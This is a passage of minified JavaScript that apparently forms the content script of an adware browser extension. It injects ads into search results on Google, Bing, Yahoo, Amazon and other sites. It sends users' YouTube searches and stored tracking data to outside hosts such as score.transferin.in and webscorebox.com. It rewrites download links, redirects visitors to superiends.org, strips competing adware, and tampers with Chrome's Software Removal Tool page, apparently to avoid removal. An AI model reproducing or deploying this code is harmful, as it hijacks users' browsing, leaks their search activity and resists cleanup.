searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"sporty-glow.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"bestonlinegadgetguide.com\")>-1||url.indexOf(\"odpu.com\")>-1||url.indexOf(\"safesearch.co\")>-1||url.indexOf(\"findamo.com\")>-1||url.indexOf(\"search.myownsearchbox.com\")>-1||url.indexOf(\"datropy.com\")>-1||url.indexOf(\"namyneck.com\")>-1||url.indexOf(\"styloosh.com\")>-1||url.indexOf(\"applicationgrabb.net\")>-1||url.indexOf(\"databass.info\")>-1||url.indexOf(\"firstfirst.net\")>-1||url.indexOf(\"liversely.com\")>-1||url.indexOf(\"liversely.net\")>-1||url.indexOf(\"livesetwebs.org\")>-1||url.indexOf(\"lp.ncdownloader.com\")>-1||url.indexOf(\"lp.vaudix.com\")>-1||url.indexOf(\"masteroids.com\")>-1||url.indexOf(\"reditions.net\")>-1||url.indexOf(\"sharesuper.info\")>-1||url.indexOf(\"storaget.info\")>-1||url.indexOf(\"westzip.in\")>-1||url.indexOf(\"boxhilade.com\")>-1||url.indexOf(\"mylinksworld.com\")>-1||url.indexOf(\"shoppingwiz.co\")>-1||url.indexOf(\"rabbitsearch.net\")>-1||url.indexOf(\"searchandbake.com\")>-1){return}}catch(e){};if(window.self.location.hostname.indexOf('mail.')==-1)\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\n};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"D17htZiJ=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"D17htZiJ=\")){var d=a.match(/D17htZiJ=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8njchVWzmPhd96pchEAen0rTw8qTgMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0rjw6pdr4qTCFqTCGrHr7qHw4qdY=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();(function(){var l=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},m=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||0:0},n=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children[b].getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children[b].getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},p=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||1:1};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{if(\"qq=\"==window.name.substr(0,3)){var f=document.getElementsByTagName(\"body\")[0];if(!f.getAttribute(\"wyttb\")){f.setAttribute(\"wyttb\",\"1\");var g=l(),d=m(),q=n(),h=p();if(g&&d&&d){var e=window.name.split(\"=\")[1];window.name=\"\";2<=d/h&&((new Image).src=\"https://score.transferin.in/subs.php?id=\"+g+\"&n=\"+d+\"&c=\"+q+\"&s=\"+h+\"&q=\"+e+\"&cb=62.87.192.114\")}}}if(-1<window.self.location.href.indexOf(\"results?search_query=\")){var k=/[\\?&]search_query=([^&#]*)/.exec(location.search),e=null===k?\"\":decodeURIComponent(k[1].replace(/\\+/g,\" \"));window.name=\"qq=\"+e}}catch(r){}})();new function(){var k=this;this.utils=new function(){var c=this;c.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var d=a[e];b=new Image;b.src=d}else b=new Image,b.src=a};c.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};c.cookie=new function(){var a=this;a.createCookie=function(a,e,d){if(d){var c=new Date;c.setTime(c.getTime()+864E5*d);d=\"; expires=\"+c.toGMTString()}else d=\"\";document.cookie=a+\"=\"+e+d+\"; path=/\"};a.readCookie=function(a){a+=\r\n\"=\";for(var e=document.cookie.split(\";\"),d=0;d<e.length;d++){for(var c=e[d];\" \"==c.charAt(0);)c=c.substring(1,c.length);if(0==c.indexOf(a))return c.substring(a.length,c.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};c.ajax={get:function(a,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&b(c.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(a,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",\r\na,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&e(c.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};c.waitForTokens={};c.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};\r\nc.waitForElement=function(a,b,e,d){var f=c.query_selector_all(a);clearTimeout(c.waitTimeout);if(25<k.waitForElementCounter)return b(null);if(\"undefined\"==typeof f||1>f.length){if(c.waitForTokens[d])return b(null);var g=arguments.callee;c.waitTimeout=setTimeout(function(){k.waitForElementCounter++;g(a,b,e,d)},e)}else{if(c.waitForTokens[d])return b(null);c.waitForTokens[d]=!0;k.waitForElementCounter=0;return b(f)}};c.flushWaitForTokens=function(){c.waitForTokens={}};c.getRandomInt=function(a,b){return Math.floor(Math.random()*\r\n(b-a+1))+a};c.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle[b]?a.currentStyle[b]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=\r\na.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};c.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:\r\nfunction(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};c.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,e,c){return c.toUpperCase()})};c.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return new RegExp(a)};c.throttle=function(a,b){var e=null;return function(){var c=this,f=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(c,f)},b)}};c.epoch=function(){return(new Date).getTime()};\r\nc.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();c.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};c.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};\r\nc.match_url=function(a,b){for(var e=0;e<b.length;e++)if(\"string\"==typeof b[e]){var d;d=/^\\/.+\\/$/.test(b[e])?new RegExp(b[e]):c.wildcard_to_regex(b[e]);if(d instanceof RegExp&&d.test(a))return!0}};c.ping=function(a){for(var b=[\"google\",\"bing\",\"yahoo\",\"youtube\"],c=0;c<b.length;c++)if(-1<location.hostname.indexOf(b[c])){var d=new Image,f=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<f.length&&(f=encodeURIComponent(location.hostname));var g=encodeURIComponent(location.hostname);\r\nd.src=k.pixelHost+\"?hid=11783967167233671948&eid=78&pid=21566&prodid=338&v=\"+k.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=PL&pr=\"+b[c]+\"&host=\"+g+\"&ref=\"+f}};c.getAllText=function(a){for(var b=\"\",c=0;c<a.length;c++)b+=a.textContent?a.textContent:a.innetText;return b};c.duplicateElement=function(a){var b=document.createElement(a.nodeName.toLowerCase()),e=!1;a.getAttribute(\"href\")&&b.setAttribute(\"href\",\"javascript:void(0);\");for(var d in a)if(\"src\"==\r\nd||\"width\"==d||\"height\"==d)b[d]=a[d];else if(\"style\"==d)for(var f in a[d])a[d][f]&&\"\"!=a[d][f]&&(b[d][f]=a[d][f]);else e||\"nodeValue\"!=d&&\"textContent\"!=d&&\"innetText\"!=d&&\"className\"!=d||0!=a.children.length||(b[d]=a[d],e=!0);for(e=0;e<a.childNodes.length;e++)if(3==a.childNodes[e].nodeType)b.appendChild(document.createTextNode(a.childNodes[e].textContent?a.childNodes[e].textContent:a.childNodes[e].innerText));else{d=c.duplicateElement(a.childNodes[e]);f=c.getAllText(d.childNodes);var g=a.childNodes[e].textContent?\r\na.childNodes[e].textContent:a.childNodes[e].innerText;g&&(g=g.replace(f,\"\"),\"\"!=g&&(d.textContent?d.textContent=g:d.innerText=g));b.appendChild(d)}return b}};if(-1<window.location.href.indexOf(\"google.com/chrome/srt\")&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")){try{var h=parseInt(window.navigator.appVersion.match(/Chrome\\/(\\d+)\\./)[1],10)}catch(p){return}if(!(38>=h)){for(h=0;h<document.links.length;h++){var l=document.links[h],m=l.getAttribute(\"href\");if(m&&-1<m.indexOf(\"#dialog-contents\")){var m=\r\nk.utils.duplicateElement(l),n=l.parentNode;n.insertBefore(m,l);n.removeChild(l)}}(h=document.getElementById(\"dialog-contents\"))&&h.remove()}}};(function(){try{window.top==window.self&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")&&\"http:\"==window.location.protocol&&chrome.storage.local.get(\"cdbmnd\",function(a){if(!a.cdbmnd&&!localStorage.getItem(\"cdbmnd\")&&(a=document.getElementsByTagName(\"a\"),a.length))for(var b=0;b<a.length;b++)if(a[b]&&a[b].href&&\"mp3\"==a[b].href.substr(-3)){var c=a[b].href;a[b].setAttribute(\"href\",\"http://mp3juices.se/media/\"+encodeURIComponent(a[b].innerHTML)+\"/mid/\"+encodeURIComponent(encodeURIComponent(c))+\"/el/1\");a[b].setAttribute(\"id\",\"sdfsdfsfds\"+b);document.getElementById(\"sdfsdfsfds\"+b).addEventListener(\"click\",function(){chrome.storage.local.set({cdbmnd:\"2\"});localStorage.setItem(\"cdbmnd\",\"2\")},!1)}})}catch(d){}})();;if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))};(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://superiends.org/e/?f=qTsKpdCKrjUGvTwFqx1Fqdw4rHrHrdY6&eid=78&hid=11783967167233671948&pid=21566&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();;window.top==window.self&&new function(){if(!document.getElementsByTagName(\"body\").length||!document.getElementsByTagName(\"body\")[0].getAttribute(\"s11783967167233671948\")){var m=document.getElementsByTagName(\"body\")[0];m&&m.setAttribute(\"s11783967167233671948\",\"1\");var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"BuyNsave\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var f=a[e];b=new Image;b.src=f}else b=new Image,b.src=a};a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+ c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c[b];\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(b,d){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",b,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&d(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(b, d,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",b,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};d=encodeURIComponent(d);this.xhr.send(d)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a); Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all(c);clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}}; a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all= document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f= this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"== navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href: \"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=11783967167233671948&eid=78&pid=21566&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=PL&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+ b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()}, !1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&& (b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}, infospace:{hrefSelector:\".resultTitle\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://search.infospace.com/search/*\"],src_for_keyword:\"#topSearchTextBox\",validate:function(){b.utils.ping(\"validate2\");return!0}},wow:{hrefSelector:\".find\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://www.wow.com/search?*\"],src_for_keyword:\"#csbquery1\",validate:function(){b.utils.ping(\"validate2\");return!0}},duckduckgo:{hrefSelector:\".result__a\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://duckduckgo.com/?q=*\"],src_for_keyword:\"#search_form_input\", validate:function(){b.utils.ping(\"validate2\");return!0}},contenko:{hrefSelector:\"#title\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://contenko.com/#/?q=*\"],src_for_keyword:\"#searchBar input[type='text']\",validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\", urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"== a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\", tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0], !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\", validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild(c)},validate:function(){return!0}},superpages:{unique_search_divs:\"1\",urls:[\"http://yellowpages.superpages.com/listings.jsp?*\"],src_for_keyword:\"input[type='text']#what\", 